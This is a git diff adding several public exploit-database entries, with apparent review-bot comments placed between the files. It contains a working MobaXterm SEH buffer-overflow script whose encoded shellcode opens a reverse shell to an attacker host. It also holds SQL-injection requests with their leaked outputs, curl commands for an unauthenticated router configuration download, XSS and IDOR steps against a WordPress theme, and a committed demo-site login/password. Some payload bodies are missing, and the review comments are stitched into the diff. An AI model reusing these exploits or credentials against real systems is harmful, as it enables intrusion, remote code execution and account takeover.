diff --git a/exploits/hardware/webapps/47433.txt b/exploits/hardware/webapps/47433.txt
new file mode 100644
index 000000000..3a48eafc1
--- /dev/null
+++ b/exploits/hardware/webapps/47433.txt
@@ -0,0 +1,47 @@
+# Title: V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download
+# Date: 2019-09-27
+# Author: LiquidWorm
+# Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+# Product web page: https://www.vsolcn.com
+# Affected version: V2.03.62R_IPv6
+# V2.03.54R
+# V2.03.52R
+# V2.03.49
+# V2.03.47
+# V2.03.40
+# V2.03.26
+# V2.03.24
+# V1.8.6
+# V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The device OLT Web Management Interface is vulnerable to unauthenticated
+configuration download and information disclosure vulnerability when direct
+object reference is made to the usrcfg.conf file using an HTTP GET method. This
+will enable the attacker to disclose sensitive information and help her in
+authentication bypass, privilege escalation and/or full system access.
+
+Tested on: GoAhead-Webs
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5534
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5534.php
+
+25.09.2019
+
+--
+# PoC
+
+1# curl http://192.168.8.200/device/usrcfg.conf
+2# curl http://192.168.8.201/action/usrcfg.conf
\ No newline at end of file
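Review bot: the PoC section at the end lists two requests that differ in both host and path (/device/usrcfg.conf on 192.168.8.200 and /action/usrcfg.conf on 192.168.8.201) without saying which of the ten listed firmware versions exposes which path. Tie each path to the versions it was observed on, so an operator can tell which one applies to their build. The "1#" and "2#" prefixes also read like shell comments and would be clearer as a plain numbered list. The Desc says the file discloses "sensitive information" but never says what usrcfg.conf contains; one sentence on that would make the impact claim checkable. The file ends without a trailing newline.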
diff --git a/exploits/hardware/webapps/47434.txt b/exploits/hardware/webapps/47434.txt
new file mode 100644
index 000000000..822a1b397
--- /dev/null
+++ b/exploits/hardware/webapps/47434.txt
@@ -0,0 +1,71 @@
+# Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery
+# Author: LiquidWorm
+# Discovery Date: 2019-09-26
+# Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+# Product web page: https://www.vsolcn.com
+# Tested on: GoAhead-Webs
+# Advisory ID: ZSL-2019-5536
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php
+# Affected version: V2.03.62R_IPv6
+# V2.03.54R
+# V2.03.52R
+# V2.03.49
+# V2.03.47
+# V2.03.40
+# V2.03.26
+# V2.03.24
+# V1.8.6
+# V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+
+CSRF add admin:
+---------------
+
+
+
+
+
+
+
+
+CSRF enable SSH:
+----------------
+
+
+
+
+
+
\ No newline at end of file
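Review bot: the "CSRF add admin:" and "CSRF enable SSH:" headings are each followed only by blank lines, so the entry names two state-changing actions but shows nothing about them, and a reader cannot tell which requests lack the validity check the Desc mentions. The hunk header announces 71 added lines, so content appears to have been lost. Either carry that content as plain text that survives rendering, or drop the headings and refer to the advisory URL already given (ZSL-2019-5536). The file also ends without a trailing newline.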
diff --git a/exploits/hardware/webapps/47435.txt b/exploits/hardware/webapps/47435.txt
new file mode 100644
index 000000000..40e0b96b0
--- /dev/null
+++ b/exploits/hardware/webapps/47435.txt
@@ -0,0 +1,80 @@
+# Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation
+# Author: LiquidWorm
+# Discovery Date: 2019-09-26
+# Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+# Product web page: https://www.vsolcn.com
+# Tested on: GoAhead-Webs
+# Advisory ID: ZSL-2019-5538
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php
+# Affected version: V2.03.62R_IPv6
+# V2.03.54R
+# V2.03.52R
+# V2.03.49
+# V2.03.47
+# V2.03.40
+# V2.03.26
+# V2.03.24
+# V1.8.6
+# V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+
+
+V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation
+
+
+Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+Product web page: https://www.vsolcn.com
+Affected version: V2.03.62R_IPv6
+ V2.03.54R
+ V2.03.52R
+ V2.03.49
+ V2.03.47
+ V2.03.40
+ V2.03.26
+ V2.03.24
+ V1.8.6
+ V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The application suffers from a privilege escalation vulnerability.
+Normal user can elevate his/her privileges by sending a HTTP POST request
+setting the parameter 'user_role_mod' to integer value '1' gaining admin
+rights.
+
+
+
+
+
+
+
\ No newline at end of file
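Review bot: the first Desc paragraph ("The application interface allows users to perform certain actions via HTTP requests without performing any validity checks ...") is the cross-site request forgery description from 47434.txt and contradicts this file's title, Remote Privilege Escalation. The correct description ("setting the parameter 'user_role_mod' to integer value '1'") only appears in the second copy of the header further down. Remove the first Summary and Desc, keep a single Vendor / Affected version / Summary / Desc block, and state which endpoint accepts the POST, since the lines after the second Desc are blank. The file ends without a trailing newline.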
diff --git a/exploits/php/webapps/47426.txt b/exploits/php/webapps/47426.txt
index 264048ab9..8a0a9e3bc 100644
--- a/exploits/php/webapps/47426.txt
+++ b/exploits/php/webapps/47426.txt
@@ -5,10 +5,9 @@
# Version: 4.15
# CVE: N/A
-
-# A malicious query can be sent in base64 encoding to unserialize() function.
-# It can be deserialized as an array without any sanitization then.
-# After it, each element of the array is passed directly to the SQL query.
+# A malicious query can be sent in base64 encoding to unserialize() function.
+# It can be deserialized without any sanitization then.
+# After it, it gets passed directly to the SQL query.
#!/bin/python
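Review bot: the reworded comment drops the two details that explained the data flow, namely that the input is deserialized "as an array" and that "each element of the array is passed directly to the SQL query". The replacement "it gets passed directly to the SQL query" leaves "it" without a clear referent. If the original wording was inaccurate, say what is actually deserialized and what reaches the query; otherwise keep the original. The hunk also deletes the blank line after "# CVE: N/A", which runs the metadata header into the description, and the "#!/bin/python" context line sits below the comments where it has no effect as an interpreter line.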
diff --git a/exploits/php/webapps/47428.txt b/exploits/php/webapps/47428.txt
new file mode 100644
index 000000000..9bd9b8fa1
--- /dev/null
+++ b/exploits/php/webapps/47428.txt
@@ -0,0 +1,43 @@
+# Exploit Title: InoERP 0.7.2 - Persistent Cross-Site Scripting
+# Google Dork: None
+# Date: 2019-09-14
+# Exploit Author: strider
+# Vendor: http://inoideas.org/
+# Software Link: https://github.com/inoerp/inoERP
+# Version: 0.7.2
+# Tested on: Debian 10 Buster x64 / Kali Linux
+# CVE : None
+
+====================================[Description]====================================
+There is a security flaw on the comment section, which allows to make persistant xss without any authentication.
+An attacker could use this flaw to gain cookies to get into a account of registered users.
+
+
+====================================[Vulnerability]====================================
+extensions/comment/post_comment.php in the server part
+$$extension = new $extension;
+
+ foreach ($field_array as $key => $value) {
+ if (!empty($_POST[$value])) {
+ $$extension->$value = trim(mysql_prep($_POST[$value])); <-- escaping for htmlentities
+ } else {
+ $$extension->$value = "";
+ }
+ }
+
+includes/functions/functions.inc in the server part
+function mysql_prep($value) {
+ return $value; <-- just returns the value
+}
+
+====================================[Proof of Concept]====================================
+Step 1:
+http://your-server-ip/content.php?mode=9&content_type=forum&category_id=7
+
+Step 2:
+open a new question and submit it.
+
+Step 3:
+then paste this PoC-Code below into the comment field and submit that
+
+
\ No newline at end of file
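Review bot: in the [Vulnerability] section the annotation "<-- escaping for htmlentities" on the mysql_prep() call contradicts the function body quoted right below it, which is annotated "<-- just returns the value". Reword the first annotation to say escaping is expected at that point but not performed, so the two snippets tell one story. Step 3 refers to "this PoC-Code below", but nothing follows it. The description should also name where the stored comment is rendered, since the quoted code only shows the write path and the flaw is equally about missing output encoding on display. Minor: "persistant" should be "persistent", and the file ends without a trailing newline.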
diff --git a/exploits/php/webapps/47430.txt b/exploits/php/webapps/47430.txt
new file mode 100644
index 000000000..0364a4c48
--- /dev/null
+++ b/exploits/php/webapps/47430.txt
@@ -0,0 +1,45 @@
+# Exploit Title: thesystem 1.0 - 'server_name' SQL Injection
+# Author: Sadik Cetin
+# Discovery Date: 2019-09-26
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem
+# Software Link: https://github.com/kostasmitroglou/thesystem
+# Tested Version: 1.0
+# Tested on OS: Windows 10
+# CVE: N/A
+
+# Description:
+# Simple SQL injection after login bypass(login_required didn't used)
+
+POST /data/ HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------18467633426500
+Content-Length: 330
+Connection: close
+Referer: http://127.0.0.1:8000/data/
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
+Upgrade-Insecure-Requests: 1
+
+-----------------------------18467633426500
+Content-Disposition: form-data; name="csrfmiddlewaretoken"
+
+9LsPWlffpiAEGYeCvR9Bead9tslR18flkZRAjREhmqtJpFwNrnSBJXTH245O5sh3
+-----------------------------18467633426500
+Content-Disposition: form-data; name="server_name"
+
+' or '1=1
+-----------------------------18467633426500--
+
+
+
+HTTP/1.1 200 OK
+Date: Thu, 26 Sep 2019 12:16:11 GMT
+Server: WSGIServer/0.2 CPython/3.5.3
+Content-Type: text/html; charset=utf-8
+X-Frame-Options: SAMEORIGIN
+Content-Length: 190
+
+(23, 'test', '192.168.1.4', '22', 'test@test', 'root', '1234', 'test', 'test', '2019-09-26')(24, 'Unix', '192.168.1.5', '22', 'test@test', 'root', '1234', 'test2', 'test2', '2019-09-26')
\ No newline at end of file
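Review bot: the entry is filed under exploits/php/webapps, but the captured response carries "Server: WSGIServer/0.2 CPython/3.5.3" and the request uses a csrfmiddlewaretoken field, so the target is a Python WSGI application rather than PHP; the path and platform should reflect that. The description "after login bypass(login_required didn't used)" is hard to parse. If the meaning is that /data/ is reachable without authentication because no login check is applied to the view, say so directly, since that is a separate finding from the injection in server_name. The capture also commits csrftoken and _ga cookie values verbatim; replace them with placeholders. The title reads "thesystem 1.0" while the sibling entries use "thesystem App 1.0".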
diff --git a/exploits/php/webapps/47431.txt b/exploits/php/webapps/47431.txt
new file mode 100644
index 000000000..7d105eab5
--- /dev/null
+++ b/exploits/php/webapps/47431.txt
@@ -0,0 +1,60 @@
+# Exploit Title: thesystem App 1.0 - Persistent Cross-Site Scripting
+# Author: İsmail Güngör
+# Discovery Date: 2019-09-26
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem
+# Software Link: https://github.com/kostasmitroglou/thesystem
+# Tested Version: 1.0
+# Tested on OS: Windows 10
+# CVE: N/A
+
+# Description:
+# Stored XSS after login bypass(login_required didn't used)
+
+First of all following request is sent web server
+
+POST /data/ HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------191691572411478
+Content-Length: 332
+Connection: close
+Referer: http://127.0.0.1:8000/data/
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
+Upgrade-Insecure-Requests: 1
+
+-----------------------------191691572411478
+Content-Disposition: form-data; name="csrfmiddlewaretoken"
+
+0sryZfN7NDe4UUwhjehPQxPRtaMSq85nbGQjmLc9KL79DBOsfK0Plkvp2MwPus75
+-----------------------------191691572411478
+Content-Disposition: form-data; name="server_name"
+
+test
+-----------------------------191691572411478--
+
+After following request is sent web server
+
+GET /show_search/ HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://127.0.0.1:8000/data/
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
+Upgrade-Insecure-Requests: 1
+
+# Finally, response is shown Xtored XSS:
+
+HTTP/1.1 200 OK
+Date: Thu, 26 Sep 2019 12:25:19 GMT
+Server: WSGIServer/0.2 CPython/3.5.3
+Content-Type: text/html; charset=utf-8
+X-Frame-Options: SAMEORIGIN
+Content-Length: 176
+
+('2019-09-26 14:25:01.878572', '1')('2019-09-26 15:16:11.013642', '1')('2019-09-26 15:21:52.962785', 'test')('2019-09-26 15:23:50.367709', '')
\ No newline at end of file
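Review bot: the evidence shown does not demonstrate cross-site scripting. The POST submits server_name "test", and the /show_search/ response body is a run of plain tuples ending in an empty string (''), with no markup in it. Either the stored value was lost from the file or the wrong capture was committed. State which field /show_search/ renders without output encoding and show the stored value in a form that survives as plain text. As with 47430.txt, the "Server: WSGIServer/0.2 CPython/3.5.3" header conflicts with the exploits/php/webapps path, and the cookie values should be replaced with placeholders. Minor: "Xtored" should be "Stored".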
diff --git a/exploits/php/webapps/47432.txt b/exploits/php/webapps/47432.txt
new file mode 100644
index 000000000..9e6e54aa2
--- /dev/null
+++ b/exploits/php/webapps/47432.txt
@@ -0,0 +1,38 @@
+# Exploit Title: thesystem App 1.0 - 'username' SQL Injection
+# Author: Anıl Baran Yelken
+# Discovery Date: 2019-09-26
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem
+# Software Link: https://github.com/kostasmitroglou/thesystem
+# Tested Version: 1.0
+# Tested on OS: Windows 10
+# CVE: N/A
+# Description:
+# Simple SQL injection after login bypass(login_required didn't used)
+
+POST /check_users/ HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------54363239114604
+Content-Length: 327
+Connection: close
+Referer: http://127.0.0.1:8000/check_users/
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
+Upgrade-Insecure-Requests: 1
+-----------------------------54363239114604
+Content-Disposition: form-data; name="csrfmiddlewaretoken"
+lZVnIo12dzwRuJbCXjjr7cVAQKa4qwhBwdk85Uq4aHpWdqtNTP2rCZB8pmU1uQjj
+-----------------------------54363239114604
+Content-Disposition: form-data; name="username"
+' or '1=1
+-----------------------------54363239114604--
+
+HTTP/1.1 200 OK
+Date: Thu, 26 Sep 2019 12:40:24 GMT
+Server: WSGIServer/0.2 CPython/3.5.3
+Content-Type: text/html; charset=utf-8
+X-Frame-Options: SAMEORIGIN
+Content-Length: 34
+User:('test', '1234', 'test@test')
\ No newline at end of file
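Review bot: the captured request is not well-formed as committed. There is no blank line between "Upgrade-Insecure-Requests: 1" and the first multipart boundary, none between each Content-Disposition header and its value, and none between "Content-Length: 34" and the response body, so the headers and bodies run together and the stated "Content-Length: 327" cannot be checked against the body. 47430.txt keeps these separators; format this file the same way. The "# Description:" line also follows "# CVE: N/A" with no blank line, unlike the sibling entries. The php/webapps path conflicts with "Server: WSGIServer/0.2 CPython/3.5.3", and the cookie and token values should be replaced with placeholders.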
diff --git a/exploits/php/webapps/47436.txt b/exploits/php/webapps/47436.txt
new file mode 100644
index 000000000..81564d32a
--- /dev/null
+++ b/exploits/php/webapps/47436.txt
@@ -0,0 +1,44 @@
+# Exploit Title: WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting
+# Google Dork: inurl:/wp-content/themes/zoner/
+# Date: 2019-09-24
+# Exploit Author: m0ze
+# Vendor Homepage: https://fruitfulcode.com/
+# Software Link: https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226
+# Version: 4.1.1
+# Tested on: Parrot OS
+
+
+----[]- Persistent XSS: -[]----
+Create a new agent account, log in and press the blue «Plus» button under
+the main menu («Add Your Property» text will pop-up on hover) - you will be
+redirected to https://zoner.demo-website.com/?add-property=XXXX page. Use
+your payload inside «Address» input field («Local information» block),
+press on the «Create Property» button and check your payload on the
+https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties
+page. Your new property must be approved by admin, so this is a good point
+to steal some cookies :)
+
+Payload Sample: ">
+
+PoC: log in as agentm0ze:WhgZbOUH (login/password) and go to the
+https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties
+page.
+
+
+----[]- IDOR: -[]----
+Create a new agent account, log in and create a new property. Then go to
+the
+https://zoner.fruitfulcode.com/author/aaaagent/?profile-page=my_properties
+page and pay attention to the trash icon under your property info. Open the
+developers console and check out this code: . Edit the
+data-propertyid="XXX" attribute by typing instead of XXX desired post or
+page ID which you want to delete (you can get post/page ID on the
+tag class -> postid-494, so attribute for post with ID 494 will be
+data-propertyid="494"). After you edit the ID, click on the trash icon and
+confirm deletion (POST
+https://zoner.fruitfulcode.com/wp-admin/admin-ajax.php?action=delete_property_act&property_id=494&security=1304db23f0).
+Funny fact that you can delete ANY post & page (!) you want, security key
+is not unique for each requests so it's possible to erase all pages and
+posts within a few minutes.
\ No newline at end of file
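Review bot: the title announces only Persistent Cross-Site Scripting, but half of the body is a separate "IDOR" section describing deletion of arbitrary posts and pages via delete_property_act. The title, and the matching files_exploits.csv description, should name both issues, or the IDOR should be its own entry. The two sections also use different hosts (zoner.demo-website.com in the XSS part, zoner.fruitfulcode.com in the IDOR part), and the text commits a working login/password pair and a security value for a third-party demo site; use one placeholder host and redact the credentials. "Payload Sample:" and "check out this code:" are each followed by a fragment or nothing, so content has been lost there. The underlying finding worth stating plainly is that the security value is not bound to the property being deleted and the handler does not check ownership of property_id.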
diff --git a/exploits/windows/remote/47429.py b/exploits/windows/remote/47429.py
new file mode 100755
index 000000000..7f34eb7f3
--- /dev/null
+++ b/exploits/windows/remote/47429.py
@@ -0,0 +1,118 @@
+# Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)
+# Author: Xavi Beltran
+# Date: 2019-08-31
+# Vendor: xavibel.com
+# Vedor Page: https://mobaxterm.mobatek.net/download.html
+# Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip
+# Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/
+
+# Description:
+# SEH based Buffer Overflow in the Username field of a valid session
+# This exploit generates a malicious MobaXterm sessions file
+# When the user double clicks in the session, the shellcode is going to be executed
+# You need to adapt the exploit to your current OS Windows version
+
+#!/usr/bin/env python
+
+# This is not the IP address of the reverse shell
+# To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach
+
+ip_address = "192.168.1.88"
+port = "22"
+
+# We are going to recreate a MobaXterm sessions file export
+print ("[+] Creating the malicious MobaXterm file...")
+sessions_file = ""
+sessions_file += "[Bookmarks]\n"
+sessions_file += "SubRep=\n"
+sessions_file += "ImgNum=42\n"
+sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"
+
+# Here is the SEH Based Buffer Overflow part
+
+# [*] Exact match at offset 16672
+# We have to substract 4 that corresponds to NSEH
+junk1 = "A" * 16668
+
+# Here we need to jump forward but EB is a bad char
+# We decrease ESP and use a conditional jump after
+# I have learned this trick in OSCE. Thank you Muts
+nseh = ""
+nseh += "\x4C" # DEC ESP
+nseh += "\x4C" # DEC ESP
+nseh += "\x77\x21" # JA SHORT 1035FE59
+
+# Using a XP-SP1 so modules are compiled without SafeSEH
+# !mona seh -cp asciiprint
+# 0x762C5042 POP-POP-RET crypt32.dll
+seh = "\x42\x50\x2C\x76"
+
+# Some padding that we are going to jump over it
+junk2 = "\x42" * 29
+
+# We recover the initial state of the stack
+alignment = ""
+alignment += "\x44" # INC ESP
+alignment += "\x44" # INC ESP
+
+
+# And we reach our shellcode
+# A0 is a badchar but the generated encoded shellcode won't use it
+# /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp
+# /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell
+# Shellcode 636 bytes
+shellcode = ""
+shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x48\x49\x49"
+shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
+shellcode += "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32"
+shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x6b\x4c\x71"
+shellcode += "\x7a\x5a\x4b\x30\x4d\x79\x78\x4c\x39\x4b\x4f\x79\x6f\x6b\x4f\x33"
+shellcode += "\x50\x6c\x4b\x62\x4c\x56\x44\x77\x54\x6e\x6b\x50\x45\x55\x6c\x6e"
+shellcode += "\x6b\x51\x6c\x55\x55\x54\x38\x57\x71\x5a\x4f\x4e\x6b\x52\x6f\x37"
+shellcode += "\x68\x6e\x6b\x53\x6f\x51\x30\x36\x61\x38\x6b\x70\x49\x4e\x6b\x70"
+shellcode += "\x34\x6e\x6b\x65\x51\x58\x6e\x47\x41\x6f\x30\x6c\x59\x4e\x4c\x4e"
+shellcode += "\x64\x6f\x30\x53\x44\x36\x67\x5a\x61\x39\x5a\x64\x4d\x53\x31\x49"
+shellcode += "\x52\x4a\x4b\x6b\x44\x67\x4b\x33\x64\x66\x44\x34\x68\x41\x65\x6b"
+shellcode += "\x55\x4e\x6b\x73\x6f\x54\x64\x65\x51\x58\x6b\x73\x56\x6e\x6b\x54"
+shellcode += "\x4c\x70\x4b\x6e\x6b\x31\x4f\x77\x6c\x33\x31\x48\x6b\x47\x73\x46"
+shellcode += "\x4c\x6c\x4b\x6e\x69\x70\x6c\x55\x74\x37\x6c\x73\x51\x6f\x33\x35"
+shellcode += "\x61\x4b\x6b\x62\x44\x4e\x6b\x57\x33\x36\x50\x6e\x6b\x41\x50\x76"
+shellcode += "\x6c\x6c\x4b\x34\x30\x67\x6c\x4c\x6d\x4c\x4b\x33\x70\x43\x38\x61"
+shellcode += "\x4e\x32\x48\x6c\x4e\x62\x6e\x34\x4e\x4a\x4c\x56\x30\x79\x6f\x58"
+shellcode += "\x56\x62\x46\x51\x43\x52\x46\x70\x68\x44\x73\x45\x62\x75\x38\x42"
+shellcode += "\x57\x32\x53\x75\x62\x31\x4f\x50\x54\x4b\x4f\x78\x50\x72\x48\x68"
+shellcode += "\x4b\x5a\x4d\x6b\x4c\x45\x6b\x70\x50\x39\x6f\x6b\x66\x43\x6f\x6e"
+shellcode += "\x69\x48\x65\x41\x76\x4f\x71\x48\x6d\x76\x68\x45\x52\x53\x65\x50"
+shellcode += "\x6a\x33\x32\x4b\x4f\x6e\x30\x31\x78\x4b\x69\x73\x39\x6c\x35\x6e"
+shellcode += "\x4d\x43\x67\x6b\x4f\x6e\x36\x50\x53\x41\x43\x46\x33\x51\x43\x30"
+shellcode += "\x43\x36\x33\x57\x33\x42\x73\x49\x6f\x7a\x70\x70\x68\x49\x50\x6d"
+shellcode += "\x78\x46\x61\x33\x68\x35\x36\x73\x58\x43\x31\x6d\x6b\x62\x46\x56"
+shellcode += "\x33\x4e\x69\x69\x71\x5a\x35\x51\x78\x7a\x4c\x4c\x39\x4e\x4a\x31"
+shellcode += "\x70\x36\x37\x49\x6f\x59\x46\x50\x6a\x52\x30\x70\x51\x31\x45\x6b"
+shellcode += "\x4f\x5a\x70\x71\x76\x72\x4a\x62\x44\x53\x56\x73\x58\x42\x43\x50"
+shellcode += "\x6d\x41\x7a\x32\x70\x42\x79\x51\x39\x38\x4c\x4c\x49\x69\x77\x71"
+shellcode += "\x7a\x41\x54\x4c\x49\x6a\x42\x70\x31\x4b\x70\x4b\x43\x6f\x5a\x4d"
+shellcode += "\x45\x4e\x69\x69\x6d\x39\x6e\x30\x42\x46\x4d\x59\x6e\x53\x72\x74"
+shellcode += "\x6c\x4c\x4d\x73\x4a\x70\x38\x4e\x4b\x4c\x6b\x4e\x4b\x31\x78\x71"
+shellcode += "\x62\x6b\x4e\x4e\x53\x76\x76\x79\x6f\x62\x55\x76\x48\x59\x6f\x4e"
+shellcode += "\x36\x53\x6b\x70\x57\x71\x42\x53\x61\x66\x31\x32\x71\x72\x4a\x34"
+shellcode += "\x41\x56\x31\x73\x61\x70\x55\x53\x61\x59\x6f\x7a\x70\x32\x48\x6c"
+shellcode += "\x6d\x38\x59\x73\x35\x58\x4e\x41\x43\x49\x6f\x6a\x76\x43\x5a\x69"
+shellcode += "\x6f\x6b\x4f\x30\x37\x59\x6f\x5a\x70\x73\x58\x6b\x57\x42\x59\x78"
+shellcode += "\x46\x70\x79\x49\x6f\x73\x45\x64\x44\x59\x6f\x7a\x76\x69\x6f\x43"
+shellcode += "\x47\x39\x6c\x39\x6f\x6e\x30\x45\x38\x6a\x50\x4f\x7a\x46\x64\x61"
+shellcode += "\x4f\x72\x73\x6b\x4f\x58\x56\x39\x6f\x78\x50\x63"
+
+crash = junk1 + nseh + seh + junk2 + alignment + shellcode
+
+# We need to mantain the MobaXterm sessions file structure
+sessions_file += crash
+sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%%%0#0# #-1"
+
+# We generate the file
+f = open( 'pwnd.mxtsessions', 'w' )
+f.write(sessions_file)
+f.close()
+
+print ("[+] pwnd.mxtsessions file created!")
+print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")
\ No newline at end of file
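Review bot: the header metadata is inconsistent. The title says "MobaXterm 12.1" while the Software Link points to MobaXterm_Portable_v11.1.zip, so the affected version is ambiguous. "# Vendor: xavibel.com" names the author's own site; the vendor is Mobatek, as the title and download URL show. "Vedor Page" should be "Vendor Page". The "#!/usr/bin/env python" line sits below the comment header, so it has no effect as an interpreter line even though the file is committed with mode 100755; move it to line 1 or drop the executable bit. The comments say the offsets and the crypt32.dll address were taken on "XP-SP1" and that the script must be adapted per Windows version; a "Tested on:" line in the header, as the other entries in this commit have, would make that visible up front. The file ends without a trailing newline.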
diff --git a/files_exploits.csv b/files_exploits.csv
index 8af18ebd6..d2ba25f5c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -17683,6 +17683,7 @@ id,file,description,date,author,type,platform,port
47408,exploits/watchos/remote/47408.py,"HPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure",2019-09-23,"Lazy Hacker",remote,watchos,
47412,exploits/windows/remote/47412.py,"File Sharing Wizard 1.5.0 - POST SEH Overflow",2019-09-24,x00pwn,remote,windows,80
47416,exploits/windows/remote/47416.rb,"Microsoft Windows - BlueKeep RDP Remote Windows Kernel Use After Free (Metasploit)",2019-09-24,Metasploit,remote,windows,3389
+47429,exploits/windows/remote/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
